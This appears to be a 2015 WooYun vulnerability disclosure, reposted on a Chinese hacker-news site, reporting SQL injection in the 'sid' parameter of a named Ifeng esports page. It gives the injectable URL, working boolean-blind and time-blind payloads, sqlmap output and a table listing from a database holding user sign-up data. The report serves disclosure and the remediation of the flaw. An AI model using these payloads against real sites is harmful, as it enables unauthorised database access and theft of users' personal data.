记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

凤凰网某站存在SQL注入之2(大量用户信息泄露)

2015-03-21 11:55

注入点

code 区域
http://esports.games.ifeng.com/sta/setuserin/?sid=dzshd1&user=





经检测参数sid存在注入



code 区域
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:

---

Place: GET

Parameter: sid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: sid=dzshd1' AND 8747=8747 AND 'gksS'='gksS&user=



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: sid=dzshd1' AND SLEEP(5) AND 'Jpnj'='Jpnj&user=

---

[23:48:08] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

漏洞证明:

可获取数据库“esports_ifeng_93”



QQ截图20150203234935.png





发现该数据库中有100多张表,应该是记录用户数据,目测很多。。。o(∩_∩)o

code 区域
| contest_main            |

| contest_type |

| game_list |

| game_type |

| hslist |

| ifeng_games_zhuanti |

| signup_userlist_1 |

| signup_userlist_10 |

| signup_userlist_11 |

| signup_userlist_12 |

| signup_userlist_13 |

| signup_userlist_14 |

| signup_userlist_15 |

| signup_userlist_16 |

| signup_userlist_17 |

| signup_userlist_18 |

| signup_userlist_19 |

| signup_userlist_2 |

| signup_userlist_20 |

| signup_userlist_21 |

| signup_userlist_22 |

| signup_userlist_23 |

| signup_userlist_24 |

| signup_userlist_25 |

| signup_userlist_26 |

| signup_userlist_27 |

| signup_userlist_28 |

| signup_userlist_29 |

| signup_userlist_3 |

| signup_userlist_30 |

| signup_userlist_31 |

| signup_userlist_32 |

| signup_userlist_33 |

| signup_userlist_34 |

| signup_userlist_35 |

| signup_userlist_36 |

| signup_userlist_37 |

| signup_userlist_38 |

| signup_userlist_39 |

| signup_userlist_4 |

| signup_userlist_40 |

| signup_userlist_41 |

| signup_userlist_42 |

| signup_userlist_43 |

| signup_userlist_44 |

| signup_userlist_45 |

| signup_userlist_46 |

| signup_userlist_47 |

| signup_userlist_48 |

| signup_userlist_49 |

| signup_userlist_5 |

| signup_userlist_50 |

| signup_userlist_51 |

| signup_userlist_52 |

| signup_userlist_53 |

| signup_userlist_54 |

| signup_userlist_55 |

| signup_userlist_56 |

| signup_userlist_57 |

| signup_userlist_58 |

| signup_userlist_59 |

| signup_userlist_6 |

| signup_userlist_60 |

| signup_userlist_61 |

| signup_userlist_62 |

| signup_userlist_63 |

| signup_userlist_64 |

| signup_userlist_65 |

| signup_userlist_66 |

| signup_userlist_67 |

| signup_userlist_68 |

| signup_userlist_69 |

| signup_userlist_7 |

| signup_userlist_70 |

| signup_userlist_71 |

| signup_userlist_72 |

| signup_userlist_73 |

| signup_userlist_74 |

| signup_userlist_75 |

| signup_userlist_76 |

| signup_userlist_77 |

| signup_userlist_78 |

| signup_userlist_79 |

| signup_userlist_8 |

| signup_userlist_9 |

| signup_userlist_tmplate |

| userinfo_list |

| userlist |

| warlist_1 |

| warlist_10 |

| warlist_11 |

| warlist_12 |

| warlist_13 |

| warlist_14 |

| warlist_15 |

| warlist_16 |

| warlist_17 |

| warlist_18 |

| warlist_19 |

| warlist_2 |

| warlist_20 |

| warlist_21 |

| warlist_22 |

| warlist_23 |

| warlist_24 |

| warlist_25 |

| warlist_26 |

| warlist_27 |

| warlist_28 |

| warlist_29 |

| warlist_3 |

| warlist_30 |

| warlist_31 |

| warlist_32 |

| warlist_33 |

| warlist_34 |

| warlist_35 |

| warlist_36 |

| warlist_37 |

| warlist_38 |

| warlist_39 |

| warlist_4 |

| warlist_40 |

| warlist_41 |

| warlist_42 |

| warlist_43 |

| warlist_44 |

| warlist_45 |

| warlist_46 |

| warlist_47 |

| warlist_48 |

| warlist_49 |

| warlist_5 |

| warlist_50 |

| warlist_51 |

| warlist_52 |

| warlist_53 |

| warlist_54 |

| warlist_55 |

| warlist_56 |

| warlist_57 |

| warlist_58 |

| warlist_59 |

| warlist_6 |

| warlist_60 |

| warlist_61 |

| warlist_62 |

| warlist_63 |

| warlist_65 |

| warlist_66 |

| warlist_67 |

| warlist_68 |

| warlist_69 |

| warlist_7 |

| warlist_70 |

| warlist_71 |

| warlist_72 |

| warlist_73 |

| warlist_74 |

| warlist_77 |

| warlist_78 |

| warlist_79 |

| warlist_8 |

| warlist_9 |

| warlist_tmplate |





猜解其中的signup_userlist_1表,只读取其中一条数据。。其他表及其数据并未涉及



QQ截图20150204004619.png





望及时修复,这次会有20Rank么。。

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-095544

阅读:80242 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“凤凰网某站存在SQL注入之2(大量用户信息泄露)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云